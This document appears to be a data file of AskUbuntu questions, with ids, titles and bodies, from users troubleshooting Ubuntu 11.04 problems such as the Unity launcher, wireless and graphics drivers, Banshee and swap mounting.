38381	codeblocks gui problems	i 'm having problems with code : :blocks 10.05 my os specs : ubuntu 11.04 - fresh install gtk theme : ambiance unity the actual problem ( do n't mind the code nor the errors ) the most visible one - stripes as i scroll down the code , the horizontal stripes start to show up . i think it 's some problem with the screen updating , because when i force it to update ( for example by selecting the text or invocating the contextual menu by pressing the right mouse button ) , the stripes disappear . the second one - font colour bug i believe this is the ambiance 's bug because it does n't happen in other themes . you can see it in the left panel where it says `` workspace '' and in the panel at the bottom in the build messages tab : the selected line makes the text barely readable . is there any fix to these bugs ? thanks .
38385	error fetchin ' ati driver 64 bit	whenever i try to install the ati 64bit drivers from jockey this comes up failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-i386_2.12.1-0ubuntu8_amd64.deb 404 not found [ ip : 91.189.92.166 80 ]
38386	unity 1 pixel border affects compiz button-binding shortcuts	why is there a invisible 1-pixel border around the entire edge of the screen in unity ? the pointer does n't reach the edge of the screen . this means compiz button-binding shortcuts that involve clicking on an edge or a corner of the screen do n't work . i used to like the shortcut i had for the scale plug-in as a click in the bottom-right corner . i would like to know the reason for this mildly annoying border . i would also like to know how to fix this issue with compiz , either by removing the border or increasing the radius from the edge of the screen with which compiz accepts clicks . the edge-binding shortcuts work because i assume compiz measures mouse movement within a greater radius from the edge of the screen for edge binding .
38387	broadcom wireless not working ( worked on live session )	just installed natty . when running the live session the wireless was working perfectly . after installation however , it does n't work at all . there is an option to install the broadcom restricted drivers , but when i click activate , i just get a `` jockey '' error , pointing me to /var/log/jockey.log . this is what that file contains : 2011-04-30 11:31:15,648 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2011-04-30 11:31:15,686 debug : xorgdriverhandler ( % s , % s ) .enabled ( ) : no x.org driver set , not checking 2011-04-30 11:31:15,849 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2011-04-30 11:31:15,884 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2011-04-30 11:31:15,918 debug : xorgdriverhandler ( % s , % s ) .enabled ( ) : no x.org driver set , not checking this is the only issue i 'm having with natty , i 'm hoping someone can help me fix this ( if it 's not a bug ) .
38391	application menu with root owned windows ?	how do i let root-owned windows use global menu ? i already have the 'title bar info ' compiz plug-in telling me that the window is root 's , i do n't want the existence of the menu bar telling me that it 's not my window as well . i would like some consistency .
38392	no sound in right speaker	i have a acer travelmate 5742g . fresh install of ubuntu 11.04 32bit . i have no sound in the rights speaker . only sound in the left speaker ( onboard speakers ) how can i fix this please ?
38394	how do i change the `` favourite '' files and folders in the files and folder lens in natty ?	in the files and folders lens in natty , it lists all the folders in my home directory as `` favourite folders '' . i store all my documents on a seperate shared drive , so how can i `` pin '' the actual folders i use here instead of these empty ones ?
38398	application menu only on maximised windows ?	i know that there is a way to disable global menu . i do n't quite want this as i quite like ( at least one thing about ) global menu . i would like to know if there is a way of disabling global menu for non-maximised windows . thus i ask : is this possible and if so , how is it done ? to me , the menu bar/global menu should be visually a part of the window since it is a part of the program and the window is meant to encapsulate the program . global menu is only visually a part of a window when the window is maximised and merged with the top bar . i do n't like bits of my windows floating all around the screen . you would n't drive a car when the driver 's seat is on the roof of your house .
38400	how can i diagnose and report screen flickers in unity after upgrading ?	i just upgraded and was excited to try unity . i logged in normally , but got the following symptoms : although my background image showed normally , all my icons and any windows i opened flickered in and out every few seconds i opened a terminal window with a keyboard shortcut , but could n't type anything in it i did n't see any menus for shutting down or logging out , so i had to do so with the power button after rebooting , i tried recovery mode , but that eventually went to a black screen and did nothing else . i succeeded in booting by doing this : boot to `` normal '' ubuntu ( not recovery mode ) choose my user name while the password box is on the screen , choose `` ubuntu classic '' from the menu at the bottom log in everything looks fine now , but i 'm using gnome and not unity . how can i diagnose my issues with unity and get it working ?
38401	windows vista/ubuntu 11.04	i 'd like to install ubuntu 11.04 on an existing windows vista installation . however , if i see that ubuntu does n't fit my needs , i 'd like to have the option to remove ubuntu and reinstall windows vista on top of it . is that possible with a `` windows anytime upgrade '' disc that i got from my manufacturer ( toshiba ) and with a genuine license key for windows ?
38404	can i view my files sorted by date ?	can i view my files sorted by date ? i want to see my files sorted by date , i mean the first one the newest . i did n't find this option . thanks in advance .
38406	unity launcher menu `` reaction speed ''	hello all , i have noticed that , having the unity on ubuntu 11.04 in its default configuration , when i move the mouse to the left border of my desktop , the unity launcher appears `` fairly slow '' ( i.e : it takes 0.5 sec to show up ) . on the other hand , if i move the mouse to the top left corner of my screen , the unity launcher shows up instantly . is there any way to change the `` reaction speed '' of the launcher ? it bother me a bit this aprox . half a second that it takes to show up . am i the only one complaining about this ? i could n't find any information about this `` issue '' so far . thanks !
38410	how to correctly disable auto-hide in unity 2d ?	i 'm using unity-2d in ubuntu 11.04 since 3d version is not working good in virtual machines ( i use virtualbox from macos x ) . all works fine except auto-hide . with windows and mac os i get user for taskbar to be permanently on the screen - so i have issued `` gconf-editor '' and changed auto-hide for unity from `` 2 '' to `` 0 '' . this stops it from hiding , but now all windows that i start ( firefox , explorer etc ) completely ignores unity taskbar and alignes themself on the left side of screen as if taskbar is hidden : ( . is it any way to fix it and make fullscreen / newly created windows to correctly align themselves on the right side of taskbar and not ignore it ?
38412	how do i fix gnome after update ?	i upgraded my ubuntu 10.10 to 11.04 using the little pop-up `` do you want to upgrade ? '' box , but now when i log into my gnome desktop , the desktop files load ( drives/random picture/etc ) but the actual gui does n't load . there 's not menu bar/tray etc the hotkeys for switching desktops still work , crtl + alt + f1 works , and i can create shortcuts - but that 's it . anyone know how to fix it ? i installed kde as a backup awhile back , but i really would prefer to have gnome back : /
38413	navigating between app icons in unity with the keyboard	i just installed ubuntu with unity-2d inside vmware . i press super to search for an app , i start typing something like `` te '' and then get a bunch of apps . how do i navigate between them with the keyboard ? edit : please do n't post an answer before you verified that it works . i want to know which keys actually work , not which keys are supposed to work .
38414	how to verify whether i have updated from beta to stable ?	i has been using ubuntu 11 beta , i want to verify i have the stable version . i read that i should use update manager to update , and read that the was supposed to be an `` upgrade platform '' or similar button , something i used when i updated from ubuntu 10.10 to 11 beta . but this time , i dont see that , just normal updates . i tried cat /etc/issue ubuntu 11.04 \n \l is it the latest ?
38417	download deb packages with download manager instead of apt ?	hi there i know that deb packages i downloaded are in : /var/cache/apt/archives/ and i can save them for future use . however , there is a problem when i download a package using the apt-get command , download speed is too slow . when i download files with a download manager i can get up to 1mb/s ! how can i get the url of the package and download it with a download manager ?
38428	upgrade to 11.04 freezes	aaargh , i tried to upgrade to 11.04 but with 6 minutes left to complete it froze all up . i had to cut power to try to restart . now it does not boot anymore . somewhere in the text i find `` kernel panic '' so i assume this is something serious ? problem is that on this computer i have my emails and have not been able to recover them yet using the live cd because i am suddenly not the owner any more . 11.04 works perfectly from the live cd .
38431	is it possible to use an alternate cd as livecd ?	i 've used the alternate cd for installing my system . when i boot from the cd , i do not see a `` live '' option as in the desktop cd . do i really need this desktop cd for a live session , or is it possible with the alternate cd as well ?
38432	how to get compiz cube effect to work in classic mode ?	i installed ccsm ( configure compiz with compizconfig ) and configure to use effects , desktop cube and rotate cube . but it does not work on my laptop , msi cr420 . i do n't use compiz on unity ( nn 11.04 ) . i configure compiz on ubuntu classic ( nn 11.04 ) session and want to use it on that session only .
38434	is it possible to configure the menubars to stay on their associated window in unity ?	the unity interface displays the menubars of the applications on the top panel . this makes sense in a netbook or other limited gui contexts but it an unnecessary optimisation for large desktop displays , is it possible to change this behaviour ? , if not , why not ? , it seems to go against the culture of linux to restrict the tweaking users can apply to their systems
38440	how to import playlists from rhythmbox into banshee ?	since banshee became the default player in natty , i want to import my playlists from rhythmbox . banshee offers an 'import playlists ' feature but it does not recognize rhythmbox 's playlists ( in folder home/user/.local/share/rhythmbox ) .
38441	how long does it take for ubuntu one to sync my files ?	just got nattey narwhal on my laptop yesterday and thought of using u1 cloud with my netbook instead of good old scp . just copied the required stuff into /home/username/ubuntu one in my netbook and was expecting to see the stuff synced in the desktop right away . nothing of that sort . almost two hours later i get a popup saying that the files are getting downloaded . how long does it take on average ?
38442	emerald & compiz	how do i use desktop effects in ubuntu 11.04
38449	unity desktop does not load , it switches to classic mode	ubuntu 11.04 unity desktop is not loading , instead it switches to `` classic '' mode . is this something related to nvidia hardware ? by the way , my card is a geforce 210 . should i try to install the proprietary nvidia drivers ?
38456	calling unity in terminal breaks unity in x session	i 'm totally new at ubuntu . i just installed ubuntu 11.04 and it was working perfectly . i went to the terminal and typed unity , the screen went wild for a little while and then my desktop was the classic desktop which i hate . now , how can i go back to unity ? ... i restarted and watched at the options in the bottom of the screen when i select my user name but there is non that says unity on it , i chose ubuntu , since the others include classic in its `` description '' . i also went to the terminal , and typed unity again to see if i could revert it , and the same , but in the output , it was this : unity-panel-service : proceso no encontrado //process not found , i use spanish backend : gconf integration : true profile : unity adding plugins initializing core options ... done //the next row repeates many , many times , with many 0 in the last character window created on xquerytree , map state isviewable ? 1 initializing bailer options ... done initializing detection options ... done initializing composite options ... done compiz ( opengl ) - fatal : glx_ext_texture_from_pixmap is missing compiz ( opengl ) - fatal : software rendering detected compiz ( bailer ) - info : ensuring a shell for your session ... unity was just working so great = ( ...
38458	how can i browse by genre in banshee ?	is it possible to browse by genre in banshee ? per default i only see browsing enables by artist and album . can the browser be configured to support genres as well ?
38460	dell studio 1747 does n't come back from hibernate	i installed ubuntu 11.04 today and after the first hibernation my dell studio 1747 only wakes up to a blank display . i do n't see anything , not even the mouse pointer and ca n't switch to a console . are there any known bugs with the dell chipsets , the ati graphics or the broadcom wireless card ? ( i installed the 3rd party drivers for ati and broadcom . ) update i chose to encrypt my personal data . i created a swap partition on my 2nd hard drive ( the first where ubuntu is installed is an ssd ) , but i 'm not sure if that swap is in use . swapon -s filename type size used priority /dev/dm-0 partition 10239996 460 -1 /dev/dm-1 partition 4179964 0 -2 free -m total used free shared buffers cached mem : 3952 3915 36 0 1137 481 -/+ buffers/cache : 2296 1656 swap : 14081 0 14081 df -h filesystem size used avail use % eingeh채ngt auf /dev/sdb1 52g 3,7g 45g 8 % / none 2,0g 708k 2,0g 1 % /dev none 2,0g 596k 2,0g 1 % /dev/shm none 2,0g 92k 2,0g 1 % /var/run none 2,0g 0 2,0g 0 % /var/lock /home/username/.private 52g 3,7g 45g 8 % /home/username /dev/sda2 456g 135g 321g 30 % /media/data
38461	ubuntu 11.04 install did not work ?	i have a laptop that has windows 7 64-bit as the main os . i originally installed ubuntu 10.10 using wubi so i could have windows and linux to choose from at boot up . all worked great up until yesterday when i tried to install ubuntu 11.04 using wubi . now after the install when i rebooted the windows boot manager has the option to choose windows or ubuntu , when i choose ubuntu this is what it says : windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . 2 . choose your language settings , and then click `` next '' . 3 . click `` repair your computer `` if you do n't have this disc , contact your system administrator it computer manufacturer for assistance . file : \ubuntu\winboot\wubildr.mbr status : 0xc000000e info : the selected entry could not be loaded because the application is missing or corrupt . i can boot into windows just fine from the bootloader menu . i tried to uninstall wubi , deleted the files associated with wubi , then tried to do a side by side install of ubuntu 11.04 using a downloaded iso from ubuntu 's website . i burned it to a disc and booted the cd and did the install that way . still i got the same error screen as listed above . any ideas as to how i can fix grub or add grub to my boot up menu so i can boot into ubuntu 11.04 ?
38462	system hangs at startup on the wallpaper with logo	hey everyone , i have a little problem with 11.04 . i ran the update and after the reboot it takes me on the loading page but that 's all i would get . no cursors , no options just the wallpaper and the ubuntu logo.. what can i do ? it 's been like this for almost 2 hours !
38463	launcher does n't remember custom icons	okay , on a fresh install of 11.04 unity there are default icons ; these inclide libreoffice , ubuntu software center , ubuntu one , etc . when i try to modify these , as in remove them form the launcher or add new ones to the launcher , all is well until i restart my computer or log back in - all my modifications are erased and the the same default sequence remains ( libreoffice , ubuntu , software center , ubuntu one ) . during sessions i added applications to the launcher , for example banshee and pidgin , by clicking and dragging . i made sure the option `` keep in launcher '' was checked for each app . also i removed firefox and ubuntu one from the launcher , and rearranged applications . yet every time i log out or reboot my computer , the launcher is resetted to its default settings . firefox and ubuntu one , are back in the launcher ; banshee and pidgin are gone and the order of the applications on the launcher are restored . what can be possibly be the problem ? furthermore i could not add chrome to the launcher by dragging . i found a thread on bug 771172 - custom unity launcher entries not from.local/share/applications . i tried the same by moving google-chrome.desktop to /usr/share/applications , and then it did work , and i could add google-chrome on the launcher by dragging . yet still when i rebooted , the settings of the launcher were restored and google-chrome removed . i have got no idea what the origin of the problem could be . i searched the internet and the forums intensively , but i have n't found anyone with the same problem yet .
38466	atheros ar2413 not working after upgrade	i do not know much about networking , so i need some help here . i have used ubuntu since 8.04 and my wifi has worked ever since . i upgraded to 11.04 today . after first boot ( with a livecd ) my the widget listed my home network , but i could not connect to it . it is protected with wpa . i have found some random terminal commands online in case that could help you figure out what is wrong here . iwconfig : lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off ole @ ole : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:16 : d4:4d : dd:0f inet addr:192.168.0.198 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :216 : d4ff : fe4d : dd0f/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3179 errors:0 dropped:0 overruns:0 frame:0 tx packets:2721 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3846076 ( 3.8 mb ) tx bytes:340839 ( 340.8 kb ) interrupt:21 base address:0x6800 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:12 errors:0 dropped:0 overruns:0 frame:0 tx packets:12 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:720 ( 720.0 b ) tx bytes:720 ( 720.0 b ) wlan0 link encap : ethernet hwaddr 00:16 : cf:9b : da:1f up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lspci : ... ( shortened ) ... 06:01.0 ethernet controller : realtek semiconductor co. , ltd. rtl-8169 gigabit ethernet ( rev 10 ) 06:02.0 ethernet controller : atheros communications inc. ar2413 802.11bg nic ( rev 01 ) ... ( shortened ) ... update i have been playing around to try and get it around . since i do n't know what i am doing i am trying random things . thus far i think i have found a way to connect that works everytime . boot the laptop while connected with a cable . disable wifi by right clicking the network manager disable wifi by using the physical button on my laptop enable wifi with said button enable wifi by right clicking the network manager after a little while it connects could it be related to this problem ? any novel ideas on what this might be related to ? is there a setting that is n't properly enabled during booting ? update 2 i tried to do the steps above without being connected with a cable on boot ( step 1 ) but it did n't work . but the moment i plugged in the cable , it must have kickstarted the network manager , because it immediately started connecting to my wireless . i strongly feel that this is issue is connected to network manager not being initialized correctly . any one with intimate knowledge of nm who can enlighten me ? or maybe even tell me how to test reinitializing nm after boot ?
38469	toshiba satelite t135 temperature is always above normal	i just did the great jump from windows to ubuntu on my toshiba satelite t135 . it works wonderful tough i have a couple of problems . i ca n't change my screen brightness at all and the fan sensors do n't work as they have to . when i used windows the fans were working very silently almost all the time except when the temperature was above 56°c so the laptop fan worked until the ideal temperature was reached , which was 50°c . now in ubuntu they work silently even if its above 59°c and only work at high speeds when it is very hot and what is worse is that when it gets even hotter , the fan seem to interpret that it is in the ideal temp so they wont work at all ! i have installed the following software : ·libsensors4 ·lm-sensors ·fancontrol ·toshset ·toshutils but with none of this i can did anything except from some sensor testing . something interesting is that toshset and toshutils do n't run at all , toshet gives this when i run it : `` required kernel toshiba support not enabled . '' and toshutils : `` laptop does not have cooling fan or kernel module not installed '' . sorry if the solution is too obvious but i am stuck here , maybe is stupid but i think this baclkight and fan problem is something related with the acpi , because with ubuntu 10.10 i had to add `` acpi=off '' to the `` silent splash '' thing before booting or it would n't boot and stop in something that sayed kernel_thread_helper or something i do n't remember . ( now i am in ubuntu 11.04 ) i really appreciate if someone could help me ! thanks !
38474	getting 11.04 , upgrade or install ?	is using the upgrade ( when you already have an older version of ubuntu running ) exactly the same in the end as installing fresh ?
38475	upgrading to natty with /home on a separate partition	i am running ubuntu maverick and i 'm about to upgrade to 11.04 . when i installed 10.10 , i decided to set up a separate partition for my /home directory . will ubuntu automatically detect my separate /home partition and use it in natty ? if not , what can i do to configure this ?
38480	no tab bar or application menu or unity	i just had a notification that a new version of ubuntu pop up today , and after looking at some screen shots , i decided to give it a try . after i installed it and rebooted , the top and bottom bar are gone , leaving only the desktop . i can use the links on the desktop ( that 's how i started my browser ) , but the application 's menu is gone . how do i fix it ? edit : if i run unity from bash , it seems to work alright . there still is no tab bar at the bottom , i do n't know if that 's normal for unity .
38482	ubuntu 11.04 wireless network problem	in my notebook , update my ubuntu to 11.04 . after that my wireless network is down . not work now ! have ubuntu a bug about network ?
38485	how do i change a stubborn start-here icon ?	i 've been trying for a while now to change the e start-here icon that i have from the elementary icon theme . i 've replaced every start-here icon in the theme 's folder , but i was told that ubuntu also keeps a cache file , which may be the reason my changes do not take effect . how can i properly purge this `` icon cache '' ?
38487	screen flashing , application bar disappearing , mouse freezes in gnome	i recently installed ubuntu 11 64 bit server on my power edge 1650 . when gnome loads , i receive no flickering of any sort -- everything looks beautiful . i can login just fine . however , after the desktop loads , the application bar disappears and i ca n't click anything . it remains gone , though i can move the mouse . it flashes up for a second , until i move the mouse , and then the process repeats over again -- with everything disappearing . i ca n't use commands until the application appears . for instance , ctrl+alt+f1 wo n't work until the application bar reappears . all software is brand new out of the box , with default configurations . it feels like a video card configuration , but this is n't just some desktop computer i 've loaded ubuntu on -- it 's a popular server-class blade , so i 'm not sure why this would be happening ? this is my first experience with gnome and ubuntu ( and linux ) -- i have no experience , and my searches are of little help . any help is appreciated . as another note , i received a message saying something along the lines of hardware not supported for unity the first time i loaded the gui .
38488	loggin in six times	okay , i get why seahorse makes me log in six times , but is there some way i can do it just once and still have stuff work ?
38489	calendar not working in thunderbird	i have done a fresh install of ubuntu 11.04 , and then installed thunderbird . i have tried to install two extensions , lightning and then provider for google calendar . neither add-on will show up in the add-ons menu after the install and reboot of thunderbird . i have installed lightning both manually by downloading the .xpi file from the add-ons site and also trying the built-in utility for downloading add-ons in the thunderbird menu . its strange that the ubuntu repositories does not have thunderbird-lightening installed in it .
38490	how can i remove ubuntu 11.04 ?	when i turn on my computer there is no boot menu to chose windows xp or ubuntu i do n't know why . i ca n't access windows xp and this ubuntu 11.04 is slow on my computer & i do n't want it . in windows xp there is no in add/remove programs entry for ubuntu , and my local disk where is installed ubuntu is now smaller . i can not recover that free space and i can not delete that partition , so i need help .
38497	what packages are installed on a fresh installation ?	which packages are installed on a clean kubuntu 11.04 natty desktop installation ? the list of installed packages can be retrieved by running : dpkg -l | grep '^ii ' | awk ' { print `` `` $ 2 } ' ( the result is prefixed with four spaces for proper code formatting on askubuntu ) this should be done on a clean installation . live cds are not suitable for this job because these include additional packages for the installation process .
38500	home icon quicklist can not be added to unity dock	i 'm attempting to use the 'home icon quicklist ' from which custom unity launchers and quicklists do you use ? i 've checked perms and the like , but i 'm no expert on quicklist syntax so i figured i 'd ask here since others may be having this problem if they 've done an inline upgrade from lucid or karmic . after logging back in , the icon disappears completely as if there 's some type of syntax error . i 'm pretty sure the onlyshowin line might be affecting it - is this the case and which lines can i safely nuke from the `` gnome '' list before the desktop shortcuts ? is there a specific log file i can tail to take a look at why this might be failing ? [ desktop entry ] name=home folder comment=open your personal folder tryexec=nautilus exec=nautilus -- no-desktop icon=user-home terminal=false startupnotify=true type=application categories=gnome ; gtk ; core ; onlyshowin=gnome ; x-gnome-bugzilla-bugzilla=gnome x-gnome-bugzilla-product=nautilus x-gnome-bugzilla-component=general x-ubuntu-gettext-domain=nautilus x-ayatana-desktop-shortcuts=videos ; documents ; music ; pictures ; downloads [ videos shortcut group ] name=videos exec=nautilus videos targetenvironment=unity [ documents shortcut group ] name=documents exec=nautilus documents targetenvironment=unity [ music shortcut group ] name=music exec=nautilus music targetenvironment=unity [ pictures shortcut group ] name=pictures exec=nautilus pictures targetenvironment=unity [ downloads shortcut group ] name=downloads exec=nautilus downloads
38505	how can i see a list of all open windows in a panel in unity ?	is there any reason why this is missing from unity ? it 's a really helpful thing to have when you have a lot of windows open .
38507	duplicating gtk treeviews	how can i use views from .ui file many times ? i load them this way var view_orig = builder.get_object ( `` items_view '' ) as gtk.treeview ; var store_orig = builder.get_object ( `` items_store '' ) as gtk.treestore ; but i need create 10 copies of view_orig . i write it in vala .
38509	upgrade to 11.04 freezes on boot	i saw a couple of threads about upgrade problems . but none i found that is similar to my issue . i upgraded from 10.10. after all the upgrades/updates and went to reboot . the system would freeze when starting the services , i would turn it off and on again . the freeze is random . i.e . starting apache2 [ ok ] ..then later..checking battery state..then later..starting nfs [ ok ] ... i went to recovery mode and removed some of the services . but it still wont work . any ideas how to go fix this ? thx ! joey
38514	problem with screenlets and permissions ?	i ca n't get screenlets to open . i 've newly installed it on 11.04 . clicking the icon in the applications menu does n't do anything . i 'm on an acer 4810t timeline laptop . here is the terminal output when i run screenlets-manager : true create autostarter for : screenlets daemon traceback ( most recent call last ) : file `` /usr/share/screenlets-manager/screenlets-manager.py '' , line 1332 , in < module > app = screenletsmanager ( ) file `` /usr/share/screenlets-manager/screenlets-manager.py '' , line 103 , in __init__ utils.lookup_daemon_autostart ( ) file `` /usr/lib/pymodules/python2.7/screenlets/utils.py '' , line 604 , in lookup_daemon_autostart f = open ( starter , 'w ' ) ioerror : [ errno 13 ] permission denied : '/home/seamus/.config/autostart/screenlets daemon.desktop' when i run sudo screenlets-manager i get something about most things being disabled because i 'm running as root . i guess the problem is that screenlets needs access to stuff that a normal user does n't have ? can i get around this ? there is no file screenlets daemon.desktop in /home/seamus/.config/autostart/ . nor is there one in /usr/share/applications although there is a screenlets-manager.desktop there ...
38517	how to add programs to start up ?	i want to know because i am tired of just clicking on the launcher because i just leave my laptop on . also it was so easy on 10.10 . so i wonder why its so hard on 11.04 . please help me . thank you
38519	how to make brighter the connection used in network notification	in ubuntu 11.04 using unity or gnome classic the same visual bug is there . the option selected for a network connection is not highlighted enough so it is very hard to know which one is selected . in the following picture you can see the example where no option appears brighter than the others so i do not know which one is the one selected in case where i want to share a connection or have several connection options available . update - just in case nobody noticed . the intel* and **auto ethernet options can both be selected using the first card there ( the wired intel 8255dc-2 ) . the problem is that the auto ethernet does not appear highlighted or brighter than the intel option which can also be selected with the same nic . do not confuse the picture with the gray options . you can even notice that the disconnect option is the same bright white than the `` selected '' option . update2 - in the following image from ubuntu 10.10 you can see that the highlighted connection is more black than the rest . in my case , in the original theme , the option should be more white than the rest . ubuntu 11.04 with more options to show what i mean . as you can see in the image , the intel connection has the same color than the shared and realtek ones . if i had more it would confuse more the problem since with a quick glance i would not be able to find the one used at the moment . so what option do i need to edit to change the selected connection to a brighter color ?
38521	how to fix gray screen in gnome/x windows ?	gnome/x , the screen goes gray ( nearly black ) . the mouse is still there and still works . everything else still works but can not be seen . i know someone that has this problem a lot , the screen will un-blank after some minutes and everything will be fine for awhile , until it happened again . she was using 9.04 , and later upgraded to 9.10 but still had the problem . now i think she has upgraded to 10.x and still has the problem . today for the first time my laptop did this also . ubuntu 9.04 with all or nearly all updates , none of which are recent . i switched out to a text console and it worked fine , switched back to x and still gray . i think it is really black , just the back light makes it look gray . i used ps to see what was all running and killed a few things to no avail . finally i just killed the session ... for a moment the terminal was switched back to x and it un-blanked just in time to see the desktop before it all died to be replaced by the login window . i logged back in and all was fine . someone know about this ? know how to fix it ?
38523	how to make banshee notification in ubuntu 11.04 show the playlist by default	i want to be able to play music with banshee without the need to open it after i have already made my playlist . for the moment i have to open banshee at least one time for the playlist to appear in the sound options in the bar . if i do not open banshee the playlist option does not appear . the following images show both , unity 3d and gnome 2.x : and how it should look no matter if i open or not banshee : as you can see here , the playlist option appears and i can select my playlist playing the songs in it without having to open banshee for it . more friendlier . and if you need to edit the playlist then that would be a reason to open banshee ( apart from the many others of course ) .
38524	why is my storage partition xxgb , when disk utility , and gparted say otherwise ?	i created an ext4 partition to back-up my files to , and partitioned it for 102gb in gparted using a live usb . after i booted into ubuntu , i opened disk utility , and it said that the partition was actually 108gb . confused , i opened the mounted partition in nautilus , and it said the partition was only 98gb . which is correct ? did i partition it wrong ?
38526	ca n't find my wireless network after upgrade	just upgraded from 10.10 . wireless worked fine in 10.10 . after the upgrade , i can see all the local networks except my own one . restarting the router doesnt work . any ideas ? i 'm a bit lost ! it had retained the passphrase and other settings ( autowireless ) from 10.10 - but there is no network to connect to . the network is present under windows - using it now : - ) cheers tim
38531	how to drag an image to the side panel to open with chrome	when i drag an image ( in this case an png ) all elements in the panel go gray except for firefox . this means that i can open and show the png image with firefox but i also have chrome in that list . how can i make it so chrome also appears with color ( not grayed ) image of problem : only firefox appears highlighted instead of firefox and chrome
38532	how to drag kde programs to the launcher in ubuntu 11.04	i am trying to drag ktorrent to the launcher but the launcher does not accept ktorrent . it just bounces back and it does not get added . when the ktorrent icon dragged on top of the launcher , the whole launcher goes gray ( am grabbing the ktorrent from the dash search )
38533	system not mounting swap partition	this is my first time using ubuntu ( natty 11.04 ) , and i 'm having a problem . even though the swap partition exists , and set to load in fstab , it 's still not being mounted . fdisk returns this for the swap partition : file system : /dev/sda5 start : 1 end : 244 blocks : 1951744 id : 82 system : linux swap / solaris and in my fstab it says file system : /dev/sda5 mount point : none type : swap options : sw dump : 0 pass : 0 and i can load it fine with swapon /dev/sda5 but it just wo n't load at boot . is there more information that i can give to help troubleshoot ? i dont know what other info could be useful as requested , full fstab file : # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/sda6 / ext4 errors=remount-ro 0 1 /dev/sda5 none swap sw 0 0 /dev/sr1 none udf rw , noauto 0 0 i was looking at the system log and i saw this , not sure what it means or if it 's normal but : apr 29 17:57:24 caelan-ubuntu os-prober : debug : running /usr/lib/os-probes/50mounted-tests on /dev/sda5 apr 29 17:57:24 caelan-ubuntu 50mounted-tests : debug : /dev/sda5 is a swap partition ; skipping output of mountall mountall : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . mountall : connection is closed output of mountall -v http : //pastie.org/private/ras9mc7mf66yudnjoem4w swap finished ... local 4/4 remote 0/0 virtual 12/12 swap 0/0 not sure , still not loading swap ... still can be added in commandline , and my windows partition is being mounted on boot , and that is in the fstab too .
38535	3d compiz effects choppy and slow . how to fix ?	i have a ati proprietary drivers but it makes the unity 3d very slow except 2d . like everything works but it runs a bit slow and choppy . you could even see it when you see the loading circles on the chromium browser . also it shows choppiness when i have the wobbly windows turned on . can someone help me fix ?
38536	can i add icons to the sound menu ?	i would like to add a shuffle and a repeat button ( for banshee , if that matters at all ) in the sound menu is it possible to add custom buttons there ?
38539	how to make dash more friendly with commands	when i type gedit in dash i have to type the complete name gedit to open gedit . same for empathy , ktorrent and any other program . in ubuntu 10.10 for example i would do an alt+f2 and then i just type ged and the launcher would see what gui programs i had for ged ( since gedit was the only one ) the launcher would open gedit . same for typing ktorrent . i would only need to type kto or for empathy only emp . quicker and you do not need to type the whole thing . more friendlier if you ask me . for what i see right now , dash has something that the previous launcher did not , you can type torrent and he would mention ktorrent the result list . this would not have worked in the previous one since the word you start typing is how the launcher assumes the command starts . dash only needs the option to execute the first gui program that resembles the word typed . with ged he should be able to open gedit instead of trying to execute the command ged . with emp he should be able to open empathy when i press enter and so on.. how can i change the behavior of this so it works as the previous launcher . update : the problem arises when i use alt+f2 instead of the super key . both will make dash ( at least the visual dash ) but it will not behave the same . the following images show alt+f2 dash and super dash alt+f2 dash super dash as you can see , when using the alt+f2 method it does not show the correct gui tools . when using the super method it does . this was the problem . now how do i make it so both behave the same way . the super method does not appear on the keyboard shortcuts .
38546	how to/when sync gmail contacts with ubuntu one ?	will it be possible to sync my gmail contacts with ubuntu one , like we can do this with contacts from facebook ? there is some sentence in ubuntu one preferences which suggests that we can do it already . i want to sync my contacts from gmail , not import these via evolution or .csv file . i ca n't find anything about syncing gmail contacts in tutorials or faq .
38549	places menu in unity	is there a places menu in unity , similar to the one in the old gnome interface ? i really liked having such quick access to remote shares .
38554	does unity work well with the ati radeon x1200 series ?	does unity works well with ati radeon x1200 series ? i faced problem with 10:10 netbook edition unity interface was not showing up icons in the tray , whereas desktop version of 10.10 works absolutely fine . let me know if can upgrade .
38555	nvidia 5200 graphic card active but not currently in use	nvidia 5200 graphic card active but not currently in use on ubuntu 11.04 how to do that ?
38556	windows in unity are jumpy	just running the new ubuntu , i 've noticed that my windows do n't move smoothly around the screen . instead , they 're jumpy and jerky . i have a geforce 560ti . this is a higher end video card . i 'm perplexed as to why something so simple as windows compositing is so difficult . yes , i am using the nvidia binary drivers .
38560	how do you zoom in ubuntu natty ?	before update my ubuntu to natty , i zoomed in-out the screen using the winkey + mouse wheel . now , how can in zoom in-out with natty ? thanks a lot !
38565	ca n't set chromium as default browser	i open chromium and the browser ask me if i want to set it as my default browser . i click on `` set as default '' and close the browser . but when i open chromium again i get the same question . ubuntu 11.04 seems not to set chromium correctly as my default browser . how to fix that ?
38566	how can i check the health of my hard drive ?	i had a bad experience on an old dell computer where shortly after installing ubuntu on it , the hard drive failed due to excessive loading/unloading cycles . what is the best way to check the health of my hard drive in ubuntu ? can it be done from the command line ?
